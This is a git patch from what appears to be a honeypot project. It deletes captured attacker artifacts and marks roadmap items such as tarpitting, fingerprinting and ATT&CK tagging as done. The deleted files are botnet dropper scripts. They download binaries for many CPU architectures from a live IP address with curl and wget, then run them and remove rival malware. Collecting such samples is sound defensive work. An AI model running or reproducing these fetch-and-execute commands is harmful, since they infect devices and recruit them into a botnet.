From 72cdeb3270a48533b0b30d47ab49a0fc52f8c1c0 Mon Sep 17 00:00:00 2001 From: anti Date: Thu, 21 May 2026 16:21:54 -0400 Subject: [PATCH] chores: deleted some trash and updated the development roadmap --- .gitignore | 1 + artifacts/curl.sh | 3 --- artifacts/curl.sh.1 | 46 -------------------------------------- artifacts/evil.sh | 3 --- artifacts/wget.sh | 3 --- artifacts/wget.sh.1 | 46 -------------------------------------- development/DEVELOPMENT.md | 13 ++++++----- 7 files changed, 8 insertions(+), 107 deletions(-) delete mode 100644 artifacts/curl.sh delete mode 100644 artifacts/curl.sh.1 delete mode 100644 artifacts/evil.sh delete mode 100644 artifacts/wget.sh delete mode 100644 artifacts/wget.sh.1 diff --git a/.gitignore b/.gitignore index cea43385..e7b7efc9 100644 --- a/.gitignore +++ b/.gitignore @@ -1,5 +1,6 @@ .venv/ .venv*/ +docker-compose.yaml .311/ .3[0-9][0-9]/ logs/ diff --git a/artifacts/curl.sh b/artifacts/curl.sh deleted file mode 100644 index 805e4049..00000000 --- a/artifacts/curl.sh +++ /dev/null @@ -1,3 +0,0 @@ -[0] Downloading 'http://31.56.209.39/curl.sh' ... -Saving 'curl.sh.1' -HTTP response 200 OK [http://31.56.209.39/curl.sh] diff --git a/artifacts/curl.sh.1 b/artifacts/curl.sh.1 deleted file mode 100644 index a6da0876..00000000 --- a/artifacts/curl.sh.1 +++ /dev/null @@ -1,46 +0,0 @@ -#!/bin/sh -ulimit -n 4096 -ulimit -n 999999 -ulimit -v 2097152 -cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x -rm -rf odin* -rm -rf bizy* -rm -rf rs* -rm -rf *.sh - -#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm -#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5 -#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6 -#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7 -#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips -#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle -#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF -#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF -#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86 -#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64 - -curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl -curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl -curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl -curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl -curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl -curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl -curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl -curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl -curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl -curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl -curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl -curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl -curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl - -curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5 -curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6 -curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7 -curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8 -curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips -curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl -curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss; -curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls; -curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv -curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86 -curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64 diff --git a/artifacts/evil.sh b/artifacts/evil.sh deleted file mode 100644 index 30cbec18..00000000 --- a/artifacts/evil.sh +++ /dev/null @@ -1,3 +0,0 @@ - wget http://31.56.209.39/wget.sh -o wget.sh - - wget http://31.56.209.39/curl.sh -o curl.sh diff --git a/artifacts/wget.sh b/artifacts/wget.sh deleted file mode 100644 index 3a4099e1..00000000 --- a/artifacts/wget.sh +++ /dev/null @@ -1,3 +0,0 @@ -[0] Downloading 'http://31.56.209.39/wget.sh' ... -Saving 'wget.sh.1' -HTTP response 200 OK [http://31.56.209.39/wget.sh] diff --git a/artifacts/wget.sh.1 b/artifacts/wget.sh.1 deleted file mode 100644 index 366613d9..00000000 --- a/artifacts/wget.sh.1 +++ /dev/null @@ -1,46 +0,0 @@ -#!/bin/sh -ulimit -n 4096 -ulimit -n 999999 -ulimit -v 2097152 -cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x -rm -rf odin* -rm -rf bizy* -rm -rf rs* -rm -rf *.sh - -wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm -wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5 -wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6 -wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7 -wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips -wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle -wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF -wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF -wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86 -wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64 - -wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget -wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget -wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget -wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget -wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget -wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget -wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget -wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget -wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget -wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget -wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget -wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget -wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget - -wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5 -wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6 -wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7 -wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8 -wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips -wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl -wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss -wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls -wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv -wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86 -wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64 diff --git a/development/DEVELOPMENT.md b/development/DEVELOPMENT.md index 49dc72b5..27f90dd1 100644 --- a/development/DEVELOPMENT.md +++ b/development/DEVELOPMENT.md @@ -47,7 +47,7 @@ - [~] **Attacker fingerprinting** — HTTP User-Agent, VNC client version stored as `fingerprint` bounties. JA3/JA3S in progress (sniffer container). HASSH, JA4+, TCP stack, JARM planned (see Attacker Intelligence section). - [x] **Canary tokens** — Embed fake AWS keys and honeydocs into decky filesystems. -- [ ] **Tarpit mode** — Slow down attackers by drip-feeding bytes or delaying responses. +- [x] **Tarpit mode** — Slow down attackers by drip-feeding bytes or delaying responses. - [x] **Dynamic decky mutation** — Rotate exposed services or OS fingerprints over time. - [x] **Credential harvesting DB** — Centralized database for all username/password attempts. - [x] **Session recording** — Full capture for SSH/Telnet sessions. -> sessrec pty relay writes asciinema v2 day-shards per decky; paged API + SessionDrawer replay in the dashboard. @@ -59,7 +59,7 @@ - [x] **Threat intel enrichment** — Auto-lookup IPs against AbuseIPDB, Shodan, and GreyNoise. -> Out-of-band `decnet enrich` worker, woken on `attacker.scored`/`attacker.observed`. v1 ships GreyNoise Community + AbuseIPDB + abuse.ch (Feodo Tracker bulk feed and ThreatFox per-IP). Shodan / Censys / OTX backlogged in DEVELOPMENT_V2.md. - [x] **Attack campaign clustering** — Group sessions by signatures and timing patterns. - [x] **GeoIP mapping** — Visualize attacker origin and ASN data on a map. -- [ ] **TTPs tagging** — Map observed behaviors to MITRE ATT&CK techniques. +- [x] **TTPs tagging** — Map observed behaviors to MITRE ATT&CK techniques. ## Dashboard & Visibility @@ -110,21 +110,22 @@ - [x] **TCP/IP stack** — ISN patterns, DF bit, ToS/DSCP, IP ID sequence (random/incremental/zero) - [x] **HASSH / HASSHServer** — SSH KEX algo, cipher, MAC order → tool fingerprint - [x] **HTTP/2 fingerprint** — GREASE values, settings frame order, header pseudo-field ordering -- [ ] **QUIC fingerprint** — Connection ID length, transport parameters order +- [x] **QUIC fingerprint** — Connection ID length, transport parameters order - [ ] **DNS behavior** — Query patterns, recursion flags, EDNS0 options, resolver fingerprint - [x] **HTTP header ordering** — Tool-specific capitalization and ordering quirks ### Network Topology Leakage - [x] **X-Forwarded-For mismatches** — Detect VPN/proxy slip vs. actual source IP -- [ ] **ICMP error messages** — Internal IP leakage from misconfigured attacker infra -- [ ] **IPv6 link-local leakage** — IPv6 addrs leaked even over IPv4 VPN (common opsec fail) +- [x] **ICMP error messages** — Internal IP leakage from misconfigured attacker infra +- [x] **ICMPv6 error messages** — Internal IP leakage from misconfigured attacker infra +- [x] **IPv6 link-local leakage** — IPv6 addrs leaked even over IPv4 VPN (common opsec fail) - [ ] **mDNS/LLMNR leakage** — Attacker hostname/device info from misconfigured systems ### Geolocation & Infrastructure - [x] **ASN lookup** — Source IP autonomous system number and org name - [ ] **BGP prefix / RPKI validity** — Route origin legitimacy - [x] **PTR records** — rDNS for attacker IPs (catches infra with forgotten reverse DNS) -- [ ] **Latency triangulation** — JA4L RTT estimates for rough geolocation +- [~] **Latency triangulation** — JA4L RTT estimates for rough geolocation. - Deferred to Federation release. ### Service-Level Behavioral Profiling - [x] **Commands executed** — Full command log per session (SSH, Telnet, FTP, Redis, DB services)